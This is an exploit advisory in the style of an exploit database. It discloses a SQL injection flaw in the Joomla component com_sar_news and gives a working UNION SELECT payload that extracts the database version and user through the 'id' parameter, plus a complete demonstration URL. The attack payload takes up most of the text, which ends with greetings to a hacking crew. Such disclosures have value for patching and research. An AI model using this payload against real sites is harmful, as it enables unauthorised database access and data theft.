# Exploit Title: Joomla com_sar_news SQL Injection vulnerability
# Date: 02 juni 2010
# Author: LyNx (syntax3rror@ymail.com)
# Platform / Tested on: Windows XP 2
# category: webapps/0day
# Code :

==== SQLI EXPLOIT ====
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*

==== VULN IN HERE ====

http://localhost/joomla/index.php?option=com_sar_news&id=80[c0de]&sort_by=ordering


==== LIVE DEMO ====

http://localhost/joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering

[x]-------------------------------------------------------------------
Thanks To :
system_rt0, bobyhikaru, kamtiEz, r3m1ck, otong, bumble_be, anharku,
virgi, ranggamaggic, shadowsmaker
suddent_death, pl4nkt0n, pokeng, demnas, Xr0b0t, all crew indonesia
hacker and all outsider...

[x]-------------------------------------------------------------------
[x] www.indonesianhacker.or.id
[x] kuat kita bersinar
[x]-------------------------------------------------------------------